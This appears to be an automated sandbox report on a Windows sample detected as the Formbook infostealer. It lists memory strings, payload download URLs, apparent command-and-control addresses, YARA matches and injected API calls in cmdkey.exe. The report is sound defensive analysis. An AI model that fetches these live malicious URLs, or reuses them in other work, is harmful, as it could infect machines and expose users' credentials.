        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: ImBm40hNZ2.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: ImBm40hNZ2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: cmdkey.exe, 00000005.00000002.21526958095.00000000056FE000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.00000000048EE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tilda.cc
        Source: cmdkey.exe, 00000005.00000002.21526958095.00000000056FE000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.00000000048EE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tilda.ws/img/logo404.png
        Source: aypAdCUEzlG.exe, 00000006.00000002.21524896579.000000000133F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meetfactory.biz
        Source: aypAdCUEzlG.exe, 00000006.00000002.21524896579.000000000133F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.meetfactory.biz/o0e7/
        Source: cmdkey.exe, 00000005.00000002.21528212418.0000000006650000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526958095.000000000474A000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1728474078.0025735182&other_args=eyJ1cmkiOiAiL28wZTci
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: aypAdCUEzlG.exe, 00000006.00000002.21526023885.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www70.meetfactory.biz/
        Source: cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000004114000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cannulafactory.top/y82c?FlS=3ldH5dkH-dBLf&9B6h=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DP
        Source: cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004D92000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003F82000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: 45-0FIUV.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 45-0FIUV.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: cmdkey.exe, 00000005.00000003.17387345441.000000000314B000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21523901420.0000000003167000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387345441.0000000003141000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387654304.0000000003167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: cmdkey.exe, 00000005.00000003.17387345441.000000000314B000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21523901420.0000000003167000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387654304.0000000003167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: cmdkey.exe, 00000005.00000003.17387345441.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: cmdkey.exe, 00000005.00000003.17387345441.000000000314B000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21523901420.0000000003167000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17387654304.0000000003167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: cmdkey.exe, 00000005.00000002.21523901420.00000000030FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: cmdkey.exe, 00000005.00000003.17386369697.0000000008076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213820161.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/sCvgayhFHxN196.bin
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/sCvgayhFHxN196.bincZ
        Source: ImBm40hNZ2.exe, 00000003.00000002.17213820161.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/sCvgayhFHxN196.binhttps://www.groupriam.com/sCvgayhFHxN196.binMasssClipro
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?v
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/libs/autocomplete.min.js?ver=7.6.0
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/ajaxSearch.min.js?ve
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/helpers.min.js?ver=7
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/hiddenSidebar.min.js
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/scrollTop.min.js?ver
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/global/widgetCollapse.min.j
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/header/headerBuilder.min.js
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/menuOffsets.min.js?ver
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/menuSetUp.min.js?ver=7
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/mobileNavigation.min.j
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/menu/simpleDropdown.min.js?
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/cartWidget.min.js?ver=7.
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/loginSidebar.min.js?ver=
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/onRemoveFromCart.min.js?
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/stickySidebarBtn.min.js?
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/wishlist.min.js?ver=7.6.
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/woocommerceNotices.min.j
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-content/themes/WoodMart%20Theme/js/scripts/wc/woodmartCompare.min.js?v
        Source: ImBm40hNZ2.exe, 00000003.00000003.16872930361.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.16872772522.00000000031C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/wp-json/
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secretspark.com.bd/zI?
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003C5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
        Source: cmdkey.exe, 00000005.00000002.21528309746.000000000808F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000004294000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526958095.00000000053DA000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000003484000.00000004.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.00000000045CA000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.17498389516.000000000DAA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: cmdkey.exe, 00000005.00000003.17395387986.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, 45-0FIUV.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/?N
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/oN
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213820161.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.bin
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.bin)
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.binA
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.binpZ
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.bins
        Source: ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.bintEZ
        Source: ImBm40hNZ2.exe, 00000003.00000003.17109671684.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.groupriam.com/sCvgayhFHxN196.binws
        Source: cmdkey.exe, 00000005.00000002.21526958095.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21526023885.0000000004C12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hypepgbet.online/b4j0/?9B6h=KngNaAOjL/iTBaPxCGh1gxfB4GNPew7mjLKUgaHVamCvjinOC9GX1YGQY2QJ
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownHTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.11.20:49739 version: TLS 1.2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00404FBA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FBA

        E-Banking Fraud

        Source: Yara matchFile source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339434E0 NtCreateMutant,LdrInitializeThunk,3_2_339434E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_33942B90
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_33942D10
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33944260 NtSetContextThread,3_2_33944260
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33944570 NtSuspendThread,3_2_33944570
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B80 NtCreateKey,3_2_33942B80
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942BC0 NtQueryInformationToken,3_2_33942BC0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942BE0 NtQueryVirtualMemory,3_2_33942BE0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B10 NtAllocateVirtualMemory,3_2_33942B10
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B00 NtQueryValueKey,3_2_33942B00
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942B20 NtQueryInformationProcess,3_2_33942B20
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942A80 NtClose,3_2_33942A80
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942AA0 NtQueryInformationFile,3_2_33942AA0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942AC0 NtEnumerateValueKey,3_2_33942AC0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942A10 NtWriteFile,3_2_33942A10
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339429D0 NtWaitForSingleObject,3_2_339429D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339429F0 NtReadFile,3_2_339429F0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339438D0 NtGetContextThread,3_2_339438D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942FB0 NtSetValueKey,3_2_33942FB0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942F00 NtCreateFile,3_2_33942F00
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942F30 NtOpenDirectoryObject,3_2_33942F30
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942E80 NtCreateProcessEx,3_2_33942E80
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942EB0 NtProtectVirtualMemory,3_2_33942EB0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942ED0 NtResumeThread,3_2_33942ED0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942EC0 NtQuerySection,3_2_33942EC0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942E00 NtQueueApcThread,3_2_33942E00
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33942E50 NtCreateSection,3_2_33942E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F4260 NtSetContextThread,LdrInitializeThunk,5_2_038F4260
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F4570 NtSuspendThread,LdrInitializeThunk,5_2_038F4570
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F34E0 NtCreateMutant,LdrInitializeThunk,5_2_038F34E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B80 NtCreateKey,LdrInitializeThunk,5_2_038F2B80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_038F2B90
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_038F2BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B00 NtQueryValueKey,LdrInitializeThunk,5_2_038F2B00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_038F2B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2A80 NtClose,LdrInitializeThunk,5_2_038F2A80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_038F2AC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2A10 NtWriteFile,LdrInitializeThunk,5_2_038F2A10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F29F0 NtReadFile,LdrInitializeThunk,5_2_038F29F0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F38D0 NtGetContextThread,LdrInitializeThunk,5_2_038F38D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2F00 NtCreateFile,LdrInitializeThunk,5_2_038F2F00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2ED0 NtResumeThread,LdrInitializeThunk,5_2_038F2ED0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2E00 NtQueueApcThread,LdrInitializeThunk,5_2_038F2E00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2E50 NtCreateSection,LdrInitializeThunk,5_2_038F2E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_038F2DA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_038F2D10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2CF0 NtDelayExecution,LdrInitializeThunk,5_2_038F2CF0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2C30 NtMapViewOfSection,LdrInitializeThunk,5_2_038F2C30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_038F2C50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2BE0 NtQueryVirtualMemory,5_2_038F2BE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2B20 NtQueryInformationProcess,5_2_038F2B20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2AA0 NtQueryInformationFile,5_2_038F2AA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F29D0 NtWaitForSingleObject,5_2_038F29D0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2FB0 NtSetValueKey,5_2_038F2FB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2F30 NtOpenDirectoryObject,5_2_038F2F30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2E80 NtCreateProcessEx,5_2_038F2E80
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2EB0 NtProtectVirtualMemory,5_2_038F2EB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2EC0 NtQuerySection,5_2_038F2EC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2DC0 NtAdjustPrivilegesToken,5_2_038F2DC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2D50 NtWriteVirtualMemory,5_2_038F2D50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F3C90 NtOpenThread,5_2_038F3C90
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2CD0 NtEnumerateKey,5_2_038F2CD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2C10 NtOpenProcess,5_2_038F2C10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F2C20 NtSetInformationFile,5_2_038F2C20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F3C30 NtOpenProcessToken,5_2_038F3C30
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029370 NtReadFile,5_2_03029370
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029200 NtCreateFile,5_2_03029200
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03029670 NtAllocateVirtualMemory,5_2_03029670
